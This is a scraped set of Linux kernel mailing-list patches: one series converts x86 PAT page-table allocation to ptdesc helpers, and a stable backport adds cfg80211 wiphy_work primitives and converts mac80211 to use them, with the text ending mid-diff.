diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
index 6c6eb486f7a6..f9f9d4ca8e71 100644
--- a/arch/x86/mm/pat/set_memory.c
+++ b/arch/x86/mm/pat/set_memory.c
@@ -1408,7 +1408,7 @@ static bool try_to_free_pte_page(pte_t *pte)
 		if (!pte_none(pte[i]))
 			return false;
 
-	free_page((unsigned long)pte);
+	pagetable_free(virt_to_ptdesc((void *)pte));
 	return true;
 }
 
@@ -1537,12 +1537,15 @@ static void unmap_pud_range(p4d_t *p4d, unsigned long start, unsigned long end)
 	 */
 }
 
-static int alloc_pte_page(pmd_t *pmd)
+static int alloc_pte_ptdesc(pmd_t *pmd)
 {
-	pte_t *pte = (pte_t *)get_zeroed_page(GFP_KERNEL);
-	if (!pte)
+	pte_t *pte;
+	struct ptdesc *ptdesc = pagetable_alloc(GFP_KERNEL | __GFP_ZERO, 0);
+
+	if (!ptdesc)
 		return -1;
 
+	pte = (pte_t *) ptdesc_address(ptdesc);
 	set_pmd(pmd, __pmd(__pa(pte) | _KERNPG_TABLE));
 	return 0;
 }
@@ -1600,7 +1603,7 @@ static long populate_pmd(struct cpa_data *cpa,
 		 */
 		pmd = pmd_offset(pud, start);
 		if (pmd_none(*pmd))
-			if (alloc_pte_page(pmd))
+			if (alloc_pte_ptdesc(pmd))
 				return -1;
 
 		populate_pte(cpa, start, pre_end, cur_pages, pmd, pgprot);
@@ -1641,7 +1644,7 @@ static long populate_pmd(struct cpa_data *cpa,
 	if (start < end) {
 		pmd = pmd_offset(pud, start);
 		if (pmd_none(*pmd))
-			if (alloc_pte_page(pmd))
+			if (alloc_pte_ptdesc(pmd))
 				return -1;
 
 		populate_pte(cpa, start, end, num_pages - cur_pages,
--
2.52.0
{ "author": "\"Vishal Moola (Oracle)\" <vishal.moola@gmail.com>", "date": "Mon, 2 Feb 2026 09:20:03 -0800", "thread_id": "20260202172005.683870-1-vishal.moola@gmail.com.mbox.gz" }
lkml
[PATCH v3 0/3] Convert 64-bit x86/mm/pat to ptdescs
In order to separately allocate ptdescs from pages, we need all
allocation and free sites to use the appropriate functions.

split_large_page() allocates a page to be used as a page table. This
should be allocating a ptdesc, so convert it.

Signed-off-by: Vishal Moola (Oracle) <vishal.moola@gmail.com>
---
 arch/x86/mm/pat/set_memory.c | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
index 9f531c87531b..52226679d079 100644
--- a/arch/x86/mm/pat/set_memory.c
+++ b/arch/x86/mm/pat/set_memory.c
@@ -1119,9 +1119,10 @@ static void split_set_pte(struct cpa_data *cpa, pte_t *pte, unsigned long pfn,
 
 static int
 __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address,
-		   struct page *base)
+		   struct ptdesc *ptdesc)
 {
 	unsigned long lpaddr, lpinc, ref_pfn, pfn, pfninc = 1;
+	struct page *base = ptdesc_page(ptdesc);
 	pte_t *pbase = (pte_t *)page_address(base);
 	unsigned int i, level;
 	pgprot_t ref_prot;
@@ -1226,18 +1227,18 @@ __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address,
 static int split_large_page(struct cpa_data *cpa, pte_t *kpte,
 			    unsigned long address)
 {
-	struct page *base;
+	struct ptdesc *ptdesc;
 
 	if (!debug_pagealloc_enabled())
 		spin_unlock(&cpa_lock);
-	base = alloc_pages(GFP_KERNEL, 0);
+	ptdesc = pagetable_alloc(GFP_KERNEL, 0);
 	if (!debug_pagealloc_enabled())
 		spin_lock(&cpa_lock);
-	if (!base)
+	if (!ptdesc)
 		return -ENOMEM;
 
-	if (__split_large_page(cpa, kpte, address, base))
-		__free_page(base);
+	if (__split_large_page(cpa, kpte, address, ptdesc))
+		pagetable_free(ptdesc);
 
 	return 0;
 }
--
2.52.0
{ "author": "\"Vishal Moola (Oracle)\" <vishal.moola@gmail.com>", "date": "Mon, 2 Feb 2026 09:20:05 -0800", "thread_id": "20260202172005.683870-1-vishal.moola@gmail.com.mbox.gz" }
lkml
[PATCH v3 0/3] Convert 64-bit x86/mm/pat to ptdescs
In order to separately allocate ptdescs from pages, we need all
allocation and free sites to use the appropriate functions.

Convert these pmd allocation/free sites to use ptdescs. populate_pgd()
also allocates pagetables that may later be freed by
try_to_free_pmd_page(), so allocate ptdescs there as well.

Signed-off-by: Vishal Moola (Oracle) <vishal.moola@gmail.com>
---
 arch/x86/mm/pat/set_memory.c | 28 +++++++++++++++++-----------
 1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
index f9f9d4ca8e71..9f531c87531b 100644
--- a/arch/x86/mm/pat/set_memory.c
+++ b/arch/x86/mm/pat/set_memory.c
@@ -1420,7 +1420,7 @@ static bool try_to_free_pmd_page(pmd_t *pmd)
 		if (!pmd_none(pmd[i]))
 			return false;
 
-	free_page((unsigned long)pmd);
+	pagetable_free(virt_to_ptdesc((void *)pmd));
 	return true;
 }
 
@@ -1550,12 +1550,15 @@ static int alloc_pte_ptdesc(pmd_t *pmd)
 	return 0;
 }
 
-static int alloc_pmd_page(pud_t *pud)
+static int alloc_pmd_ptdesc(pud_t *pud)
 {
-	pmd_t *pmd = (pmd_t *)get_zeroed_page(GFP_KERNEL);
-	if (!pmd)
+	pmd_t *pmd;
+	struct ptdesc *ptdesc = pagetable_alloc(GFP_KERNEL | __GFP_ZERO, 0);
+
+	if (!ptdesc)
 		return -1;
 
+	pmd = (pmd_t *) ptdesc_address(ptdesc);
 	set_pud(pud, __pud(__pa(pmd) | _KERNPG_TABLE));
 	return 0;
 }
@@ -1625,7 +1628,7 @@ static long populate_pmd(struct cpa_data *cpa,
 	 * We cannot use a 1G page so allocate a PMD page if needed.
 	 */
 	if (pud_none(*pud))
-		if (alloc_pmd_page(pud))
+		if (alloc_pmd_ptdesc(pud))
 			return -1;
 
 	pmd = pmd_offset(pud, start);
@@ -1681,7 +1684,7 @@ static int populate_pud(struct cpa_data *cpa, unsigned long start, p4d_t *p4d,
 		 * Need a PMD page?
 		 */
 		if (pud_none(*pud))
-			if (alloc_pmd_page(pud))
+			if (alloc_pmd_ptdesc(pud))
 				return -1;
 
 		cur_pages = populate_pmd(cpa, start, pre_end, cur_pages,
@@ -1718,7 +1721,7 @@ static int populate_pud(struct cpa_data *cpa, unsigned long start, p4d_t *p4d,
 
 	pud = pud_offset(p4d, start);
 	if (pud_none(*pud))
-		if (alloc_pmd_page(pud))
+		if (alloc_pmd_ptdesc(pud))
 			return -1;
 
 	tmp = populate_pmd(cpa, start, end, cpa->numpages - cur_pages,
@@ -1742,14 +1745,16 @@ static int populate_pgd(struct cpa_data *cpa, unsigned long addr)
 	p4d_t *p4d;
 	pgd_t *pgd_entry;
 	long ret;
+	struct ptdesc *ptdesc;
 
 	pgd_entry = cpa->pgd + pgd_index(addr);
 
 	if (pgd_none(*pgd_entry)) {
-		p4d = (p4d_t *)get_zeroed_page(GFP_KERNEL);
-		if (!p4d)
+		ptdesc = pagetable_alloc(GFP_KERNEL | __GFP_ZERO, 0);
+		if (!ptdesc)
 			return -1;
 
+		p4d = (p4d_t *) ptdesc_address(ptdesc);
 		set_pgd(pgd_entry, __pgd(__pa(p4d) | _KERNPG_TABLE));
 	}
 
@@ -1758,10 +1763,11 @@ static int populate_pgd(struct cpa_data *cpa, unsigned long addr)
 	 */
 	p4d = p4d_offset(pgd_entry, addr);
 	if (p4d_none(*p4d)) {
-		pud = (pud_t *)get_zeroed_page(GFP_KERNEL);
-		if (!pud)
+		ptdesc = pagetable_alloc(GFP_KERNEL | __GFP_ZERO, 0);
+		if (!ptdesc)
 			return -1;
 
+		pud = (pud_t *) ptdesc_address(ptdesc);
 		set_p4d(p4d, __p4d(__pa(pud) | _KERNPG_TABLE));
 	}
 
--
2.52.0
{ "author": "\"Vishal Moola (Oracle)\" <vishal.moola@gmail.com>", "date": "Mon, 2 Feb 2026 09:20:04 -0800", "thread_id": "20260202172005.683870-1-vishal.moola@gmail.com.mbox.gz" }
lkml
[PATCH 5.15.y 1/3] wifi: cfg80211: add a work abstraction with special semantics
From: Johannes Berg <johannes.berg@intel.com>

[ Upstream commit a3ee4dc84c4e9d14cb34dad095fd678127aca5b6 ]

Add a work abstraction at the cfg80211 level that will always hold the
wiphy_lock() for any work executed and therefore also can be canceled
safely (without waiting) while holding that. This improves on what we
do now as with the new wiphy works we don't have to worry about
locking while cancelling them safely.

Also, don't let such works run while the device is suspended, since
they'll likely need to interact with the device. Flush them before
suspend though.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com>
---
 include/net/cfg80211.h |  95 ++++++++++++++++++++++++++++++--
 net/wireless/core.c    | 121 +++++++++++++++++++++++++++++++++++++++++
 net/wireless/core.h    |   7 +++
 net/wireless/sysfs.c   |   8 ++-
 4 files changed, 226 insertions(+), 5 deletions(-)

diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
index 66a75723f559..392576342661 100644
--- a/include/net/cfg80211.h
+++ b/include/net/cfg80211.h
@@ -5301,12 +5301,17 @@ struct cfg80211_cqm_config;
  * wiphy_lock - lock the wiphy
  * @wiphy: the wiphy to lock
  *
- * This is mostly exposed so it can be done around registering and
- * unregistering netdevs that aren't created through cfg80211 calls,
- * since that requires locking in cfg80211 when the notifiers is
- * called, but that cannot differentiate which way it's called.
+ * This is needed around registering and unregistering netdevs that
+ * aren't created through cfg80211 calls, since that requires locking
+ * in cfg80211 when the notifiers is called, but that cannot
+ * differentiate which way it's called.
+ *
+ * It can also be used by drivers for their own purposes.
  *
  * When cfg80211 ops are called, the wiphy is already locked.
+ *
+ * Note that this makes sure that no workers that have been queued
+ * with wiphy_queue_work() are running.
  */
 static inline void wiphy_lock(struct wiphy *wiphy)
 	__acquires(&wiphy->mtx)
@@ -5326,6 +5331,88 @@ static inline void wiphy_unlock(struct wiphy *wiphy)
 	mutex_unlock(&wiphy->mtx);
 }
 
+struct wiphy_work;
+typedef void (*wiphy_work_func_t)(struct wiphy *, struct wiphy_work *);
+
+struct wiphy_work {
+	struct list_head entry;
+	wiphy_work_func_t func;
+};
+
+static inline void wiphy_work_init(struct wiphy_work *work,
+				   wiphy_work_func_t func)
+{
+	INIT_LIST_HEAD(&work->entry);
+	work->func = func;
+}
+
+/**
+ * wiphy_work_queue - queue work for the wiphy
+ * @wiphy: the wiphy to queue for
+ * @work: the work item
+ *
+ * This is useful for work that must be done asynchronously, and work
+ * queued here has the special property that the wiphy mutex will be
+ * held as if wiphy_lock() was called, and that it cannot be running
+ * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can
+ * use just cancel_work() instead of cancel_work_sync(), it requires
+ * being in a section protected by wiphy_lock().
+ */
+void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work);
+
+/**
+ * wiphy_work_cancel - cancel previously queued work
+ * @wiphy: the wiphy, for debug purposes
+ * @work: the work to cancel
+ *
+ * Cancel the work *without* waiting for it, this assumes being
+ * called under the wiphy mutex acquired by wiphy_lock().
+ */
+void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work);
+
+struct wiphy_delayed_work {
+	struct wiphy_work work;
+	struct wiphy *wiphy;
+	struct timer_list timer;
+};
+
+void wiphy_delayed_work_timer(struct timer_list *t);
+
+static inline void wiphy_delayed_work_init(struct wiphy_delayed_work *dwork,
+					   wiphy_work_func_t func)
+{
+	timer_setup(&dwork->timer, wiphy_delayed_work_timer, 0);
+	wiphy_work_init(&dwork->work, func);
+}
+
+/**
+ * wiphy_delayed_work_queue - queue delayed work for the wiphy
+ * @wiphy: the wiphy to queue for
+ * @dwork: the delayable worker
+ * @delay: number of jiffies to wait before queueing
+ *
+ * This is useful for work that must be done asynchronously, and work
+ * queued here has the special property that the wiphy mutex will be
+ * held as if wiphy_lock() was called, and that it cannot be running
+ * after wiphy_lock() was called. Therefore, wiphy_cancel_work() can
+ * use just cancel_work() instead of cancel_work_sync(), it requires
+ * being in a section protected by wiphy_lock().
+ */
+void wiphy_delayed_work_queue(struct wiphy *wiphy,
+			      struct wiphy_delayed_work *dwork,
+			      unsigned long delay);
+
+/**
+ * wiphy_delayed_work_cancel - cancel previously queued delayed work
+ * @wiphy: the wiphy, for debug purposes
+ * @dwork: the delayed work to cancel
+ *
+ * Cancel the work *without* waiting for it, this assumes being
+ * called under the wiphy mutex acquired by wiphy_lock().
+ */
+void wiphy_delayed_work_cancel(struct wiphy *wiphy,
+			       struct wiphy_delayed_work *dwork);
+
 /**
  * struct wireless_dev - wireless device state
  *
diff --git a/net/wireless/core.c b/net/wireless/core.c
index d51d27ff3729..788ca1055d6a 100644
--- a/net/wireless/core.c
+++ b/net/wireless/core.c
@@ -410,6 +410,34 @@ static void cfg80211_propagate_cac_done_wk(struct work_struct *work)
 	rtnl_unlock();
 }
 
+static void cfg80211_wiphy_work(struct work_struct *work)
+{
+	struct cfg80211_registered_device *rdev;
+	struct wiphy_work *wk;
+
+	rdev = container_of(work, struct cfg80211_registered_device, wiphy_work);
+
+	wiphy_lock(&rdev->wiphy);
+	if (rdev->suspended)
+		goto out;
+
+	spin_lock_irq(&rdev->wiphy_work_lock);
+	wk = list_first_entry_or_null(&rdev->wiphy_work_list,
+				      struct wiphy_work, entry);
+	if (wk) {
+		list_del_init(&wk->entry);
+		if (!list_empty(&rdev->wiphy_work_list))
+			schedule_work(work);
+		spin_unlock_irq(&rdev->wiphy_work_lock);
+
+		wk->func(&rdev->wiphy, wk);
+	} else {
+		spin_unlock_irq(&rdev->wiphy_work_lock);
+	}
+out:
+	wiphy_unlock(&rdev->wiphy);
+}
+
 /* exported functions */
 
 struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv,
@@ -535,6 +563,9 @@ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv,
 		return NULL;
 	}
 
+	INIT_WORK(&rdev->wiphy_work, cfg80211_wiphy_work);
+	INIT_LIST_HEAD(&rdev->wiphy_work_list);
+	spin_lock_init(&rdev->wiphy_work_lock);
 	INIT_WORK(&rdev->rfkill_block, cfg80211_rfkill_block_work);
 	INIT_WORK(&rdev->conn_work, cfg80211_conn_work);
 	INIT_WORK(&rdev->event_work, cfg80211_event_work);
@@ -1002,6 +1033,31 @@ void wiphy_rfkill_start_polling(struct wiphy *wiphy)
 }
 EXPORT_SYMBOL(wiphy_rfkill_start_polling);
 
+void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev)
+{
+	unsigned int runaway_limit = 100;
+	unsigned long flags;
+
+	lockdep_assert_held(&rdev->wiphy.mtx);
+
+	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
+	while (!list_empty(&rdev->wiphy_work_list)) {
+		struct wiphy_work *wk;
+
+		wk = list_first_entry(&rdev->wiphy_work_list,
+				      struct wiphy_work, entry);
+		list_del_init(&wk->entry);
+		spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
+
+		wk->func(&rdev->wiphy, wk);
+
+		spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
+		if (WARN_ON(--runaway_limit == 0))
+			INIT_LIST_HEAD(&rdev->wiphy_work_list);
+	}
+	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
+}
+
 void wiphy_unregister(struct wiphy *wiphy)
 {
 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
@@ -1040,9 +1096,14 @@ void wiphy_unregister(struct wiphy *wiphy)
 	cfg80211_rdev_list_generation++;
 	device_del(&rdev->wiphy.dev);
 
+	/* surely nothing is reachable now, clean up work */
+	cfg80211_process_wiphy_works(rdev);
 	wiphy_unlock(&rdev->wiphy);
 	rtnl_unlock();
 
+	/* this has nothing to do now but make sure it's gone */
+	cancel_work_sync(&rdev->wiphy_work);
+
 	flush_work(&rdev->scan_done_wk);
 	cancel_work_sync(&rdev->conn_work);
 	flush_work(&rdev->event_work);
@@ -1522,6 +1583,66 @@ static struct pernet_operations cfg80211_pernet_ops = {
 	.exit = cfg80211_pernet_exit,
 };
 
+void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work)
+{
+	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
+	unsigned long flags;
+
+	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
+	if (list_empty(&work->entry))
+		list_add_tail(&work->entry, &rdev->wiphy_work_list);
+	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
+
+	schedule_work(&rdev->wiphy_work);
+}
+EXPORT_SYMBOL_GPL(wiphy_work_queue);
+
+void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work)
+{
+	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
+	unsigned long flags;
+
+	lockdep_assert_held(&wiphy->mtx);
+
+	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
+	if (!list_empty(&work->entry))
+		list_del_init(&work->entry);
+	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
+}
+EXPORT_SYMBOL_GPL(wiphy_work_cancel);
+
+void wiphy_delayed_work_timer(struct timer_list *t)
+{
+	struct wiphy_delayed_work *dwork = from_timer(dwork, t, timer);
+
+	wiphy_work_queue(dwork->wiphy, &dwork->work);
+}
+EXPORT_SYMBOL(wiphy_delayed_work_timer);
+
+void wiphy_delayed_work_queue(struct wiphy *wiphy,
+			      struct wiphy_delayed_work *dwork,
+			      unsigned long delay)
+{
+	if (!delay) {
+		wiphy_work_queue(wiphy, &dwork->work);
+		return;
+	}
+
+	dwork->wiphy = wiphy;
+	mod_timer(&dwork->timer, jiffies + delay);
+}
+EXPORT_SYMBOL_GPL(wiphy_delayed_work_queue);
+
+void wiphy_delayed_work_cancel(struct wiphy *wiphy,
+			       struct wiphy_delayed_work *dwork)
+{
+	lockdep_assert_held(&wiphy->mtx);
+
+	del_timer_sync(&dwork->timer);
+	wiphy_work_cancel(wiphy, &dwork->work);
+}
+EXPORT_SYMBOL_GPL(wiphy_delayed_work_cancel);
+
 static int __init cfg80211_init(void)
 {
 	int err;
diff --git a/net/wireless/core.h b/net/wireless/core.h
index 1720abf36f92..18d30f6fa7ca 100644
--- a/net/wireless/core.h
+++ b/net/wireless/core.h
@@ -103,6 +103,12 @@ struct cfg80211_registered_device {
 	/* lock for all wdev lists */
 	spinlock_t mgmt_registrations_lock;
 
+	struct work_struct wiphy_work;
+	struct list_head wiphy_work_list;
+	/* protects the list above */
+	spinlock_t wiphy_work_lock;
+	bool suspended;
+
 	/* must be last because of the way we do wiphy_priv(),
 	 * and it should at least be aligned to NETDEV_ALIGN */
 	struct wiphy wiphy __aligned(NETDEV_ALIGN);
@@ -457,6 +463,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev,
 			  struct net_device *dev, enum nl80211_iftype ntype,
 			  struct vif_params *params);
 void cfg80211_process_rdev_events(struct cfg80211_registered_device *rdev);
+void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev);
 void cfg80211_process_wdev_events(struct wireless_dev *wdev);
 
 bool cfg80211_does_bw_fit_range(const struct ieee80211_freq_range *freq_range,
diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c
index 0c3f05c9be27..4d3b65803010 100644
--- a/net/wireless/sysfs.c
+++ b/net/wireless/sysfs.c
@@ -5,7 +5,7 @@
  *
  * Copyright 2005-2006	Jiri Benc <jbenc@suse.cz>
  * Copyright 2006	Johannes Berg <johannes@sipsolutions.net>
- * Copyright (C) 2020-2021 Intel Corporation
+ * Copyright (C) 2020-2021, 2023 Intel Corporation
  */
 
 #include <linux/device.h>
@@ -105,14 +105,18 @@ static int wiphy_suspend(struct device *dev)
 			cfg80211_leave_all(rdev);
 			cfg80211_process_rdev_events(rdev);
 		}
+		cfg80211_process_wiphy_works(rdev);
 		if (rdev->ops->suspend)
 			ret = rdev_suspend(rdev, rdev->wiphy.wowlan_config);
 		if (ret == 1) {
 			/* Driver refuse to configure wowlan */
 			cfg80211_leave_all(rdev);
 			cfg80211_process_rdev_events(rdev);
+			cfg80211_process_wiphy_works(rdev);
 			ret = rdev_suspend(rdev, NULL);
 		}
+		if (ret == 0)
+			rdev->suspended = true;
 	}
 	wiphy_unlock(&rdev->wiphy);
 	rtnl_unlock();
@@ -132,6 +136,8 @@ static int wiphy_resume(struct device *dev)
 	wiphy_lock(&rdev->wiphy);
 	if (rdev->wiphy.registered && rdev->ops->resume)
 		ret = rdev_resume(rdev);
+	rdev->suspended = false;
+	schedule_work(&rdev->wiphy_work);
 	wiphy_unlock(&rdev->wiphy);
 
 	if (ret)
--
2.53.0.rc2.2.g2258446484
From: Johannes Berg <johannes.berg@intel.com>

[ Upstream commit 16114496d684a3df4ce09f7c6b7557a8b2922795 ]

We'll need this later to convert other works that might be cancelled
from here, so convert this one first.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com>
---
 net/mac80211/ibss.c        |  8 ++++----
 net/mac80211/ieee80211_i.h |  2 +-
 net/mac80211/iface.c       | 10 +++++-----
 net/mac80211/mesh.c        | 10 +++++-----
 net/mac80211/mesh_hwmp.c   |  6 +++---
 net/mac80211/mlme.c        |  6 +++---
 net/mac80211/ocb.c         |  6 +++---
 net/mac80211/rx.c          |  2 +-
 net/mac80211/scan.c        |  2 +-
 net/mac80211/status.c      |  5 +++--
 net/mac80211/util.c        |  2 +-
 11 files changed, 30 insertions(+), 29 deletions(-)

diff --git a/net/mac80211/ibss.c b/net/mac80211/ibss.c
index 48e0260f3424..ce927c16a915 100644
--- a/net/mac80211/ibss.c
+++ b/net/mac80211/ibss.c
@@ -746,7 +746,7 @@ static void ieee80211_csa_connection_drop_work(struct work_struct *work)
 	skb_queue_purge(&sdata->skb_queue);
 
 	/* trigger a scan to find another IBSS network to join */
-	ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+	wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 
 	sdata_unlock(sdata);
 }
@@ -1245,7 +1245,7 @@ void ieee80211_ibss_rx_no_sta(struct ieee80211_sub_if_data *sdata,
 	spin_lock(&ifibss->incomplete_lock);
 	list_add(&sta->list, &ifibss->incomplete_stations);
 	spin_unlock(&ifibss->incomplete_lock);
-	ieee80211_queue_work(&local->hw, &sdata->work);
+	wiphy_work_queue(local->hw.wiphy, &sdata->work);
 }
 
 static void ieee80211_ibss_sta_expire(struct ieee80211_sub_if_data *sdata)
@@ -1726,7 +1726,7 @@ static void ieee80211_ibss_timer(struct timer_list *t)
 	struct ieee80211_sub_if_data *sdata =
 		from_timer(sdata, t, u.ibss.timer);
 
-	ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+	wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 }
 
 void ieee80211_ibss_setup_sdata(struct ieee80211_sub_if_data *sdata)
@@ -1861,7 +1861,7 @@ int ieee80211_ibss_join(struct ieee80211_sub_if_data *sdata,
 	sdata->needed_rx_chains = local->rx_chains;
 	sdata->control_port_over_nl80211 = params->control_port_over_nl80211;
 
-	ieee80211_queue_work(&local->hw, &sdata->work);
+	wiphy_work_queue(local->hw.wiphy, &sdata->work);
 
 	return 0;
 }
diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
index 3b5350cfc0ee..8d6616f646e7 100644
--- a/net/mac80211/ieee80211_i.h
+++ b/net/mac80211/ieee80211_i.h
@@ -966,7 +966,7 @@ struct ieee80211_sub_if_data {
 	/* used to reconfigure hardware SM PS */
 	struct work_struct recalc_smps;
 
-	struct work_struct work;
+	struct wiphy_work work;
 	struct sk_buff_head skb_queue;
 	struct sk_buff_head status_queue;
 
diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
index e437bcadf4a2..eb7de2d455e1 100644
--- a/net/mac80211/iface.c
+++ b/net/mac80211/iface.c
@@ -43,7 +43,7 @@
  * by either the RTNL, the iflist_mtx or RCU.
  */
 
-static void ieee80211_iface_work(struct work_struct *work);
+static void ieee80211_iface_work(struct wiphy *wiphy, struct wiphy_work *work);
 
 bool __ieee80211_recalc_txpower(struct ieee80211_sub_if_data *sdata)
 {
@@ -539,7 +539,7 @@ static void ieee80211_do_stop(struct ieee80211_sub_if_data *sdata, bool going_do
 		RCU_INIT_POINTER(local->p2p_sdata, NULL);
 		fallthrough;
 	default:
-		cancel_work_sync(&sdata->work);
+		wiphy_work_cancel(sdata->local->hw.wiphy, &sdata->work);
 		/*
 		 * When we get here, the interface is marked down.
 		 * Free the remaining keys, if there are any
@@ -1005,7 +1005,7 @@ int ieee80211_add_virtual_monitor(struct ieee80211_local *local)
 
 	skb_queue_head_init(&sdata->skb_queue);
 	skb_queue_head_init(&sdata->status_queue);
-	INIT_WORK(&sdata->work, ieee80211_iface_work);
+	wiphy_work_init(&sdata->work, ieee80211_iface_work);
 
 	return 0;
 }
@@ -1487,7 +1487,7 @@ static void ieee80211_iface_process_status(struct ieee80211_sub_if_data *sdata,
 	}
 }
 
-static void ieee80211_iface_work(struct work_struct *work)
+static void ieee80211_iface_work(struct wiphy *wiphy, struct wiphy_work *work)
 {
 	struct ieee80211_sub_if_data *sdata =
 		container_of(work, struct ieee80211_sub_if_data, work);
@@ -1590,7 +1590,7 @@ static void ieee80211_setup_sdata(struct ieee80211_sub_if_data *sdata,
 
 	skb_queue_head_init(&sdata->skb_queue);
 	skb_queue_head_init(&sdata->status_queue);
-	INIT_WORK(&sdata->work, ieee80211_iface_work);
+	wiphy_work_init(&sdata->work, ieee80211_iface_work);
 	INIT_WORK(&sdata->recalc_smps, ieee80211_recalc_smps_work);
 	INIT_WORK(&sdata->csa_finalize_work, ieee80211_csa_finalize_work);
 	INIT_WORK(&sdata->color_change_finalize_work, ieee80211_color_change_finalize_work);
diff --git a/net/mac80211/mesh.c b/net/mac80211/mesh.c
index 6202157f467b..2f888cbe6e2b 100644
--- a/net/mac80211/mesh.c
+++ b/net/mac80211/mesh.c
@@ -44,7 +44,7 @@ static void ieee80211_mesh_housekeeping_timer(struct timer_list *t)
 
 	set_bit(MESH_WORK_HOUSEKEEPING, &ifmsh->wrkq_flags);
 
-	ieee80211_queue_work(&local->hw, &sdata->work);
+	wiphy_work_queue(local->hw.wiphy, &sdata->work);
 }
 
 /**
@@ -642,7 +642,7 @@ static void ieee80211_mesh_path_timer(struct timer_list *t)
 	struct ieee80211_sub_if_data *sdata =
 		from_timer(sdata, t, u.mesh.mesh_path_timer);
 
-	ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+	wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 }
 
 static void ieee80211_mesh_path_root_timer(struct timer_list *t)
@@ -653,7 +653,7 @@ static void ieee80211_mesh_path_root_timer(struct timer_list *t)
 
 	set_bit(MESH_WORK_ROOT, &ifmsh->wrkq_flags);
 
-	ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+	wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 }
 
 void ieee80211_mesh_root_setup(struct ieee80211_if_mesh *ifmsh)
@@ -1018,7 +1018,7 @@ void ieee80211_mbss_info_change_notify(struct ieee80211_sub_if_data *sdata,
 	for_each_set_bit(bit, &bits, sizeof(changed) * BITS_PER_BYTE)
 		set_bit(bit, &ifmsh->mbss_changed);
 	set_bit(MESH_WORK_MBSS_CHANGED, &ifmsh->wrkq_flags);
-	ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+	wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 }
 
 int ieee80211_start_mesh(struct ieee80211_sub_if_data *sdata)
@@ -1043,7 +1043,7 @@ int ieee80211_start_mesh(struct ieee80211_sub_if_data *sdata)
 	ifmsh->sync_offset_clockdrift_max = 0;
 	set_bit(MESH_WORK_HOUSEKEEPING, &ifmsh->wrkq_flags);
 	ieee80211_mesh_root_setup(ifmsh);
-	ieee80211_queue_work(&local->hw, &sdata->work);
+	wiphy_work_queue(local->hw.wiphy, &sdata->work);
 	sdata->vif.bss_conf.ht_operation_mode =
 		ifmsh->mshcfg.ht_opmode;
 	sdata->vif.bss_conf.enable_beacon = true;
diff --git a/net/mac80211/mesh_hwmp.c b/net/mac80211/mesh_hwmp.c
index 8bf238afb544..a3522b21803f 100644
--- a/net/mac80211/mesh_hwmp.c
+++ b/net/mac80211/mesh_hwmp.c
@@ -1,7 +1,7 @@
 // SPDX-License-Identifier: GPL-2.0-only
 /*
  * Copyright (c) 2008, 2009 open80211s Ltd.
- * Copyright (C) 2019, 2021 Intel Corporation
+ * Copyright (C) 2019, 2021-2023 Intel Corporation
  * Author:     Luis Carlos Cobo <luisca@cozybit.com>
  */
 
@@ -1020,14 +1020,14 @@ static void mesh_queue_preq(struct mesh_path *mpath, u8 flags)
 	spin_unlock_bh(&ifmsh->mesh_preq_queue_lock);
 
 	if (time_after(jiffies, ifmsh->last_preq + min_preq_int_jiff(sdata)))
-		ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+		wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 
 	else if (time_before(jiffies, ifmsh->last_preq)) {
 		/* avoid long wait if did not send preqs for a long time
 		 * and jiffies wrapped around
 		 */
 		ifmsh->last_preq = jiffies - min_preq_int_jiff(sdata) - 1;
-		ieee80211_queue_work(&sdata->local->hw, &sdata->work);
+		wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work);
 	} else
 		mod_timer(&ifmsh->mesh_path_timer,
 			  ifmsh->last_preq + min_preq_int_jiff(sdata));
diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
index 6e86a23c647d..d147760e8389 100644
--- a/net/mac80211/mlme.c
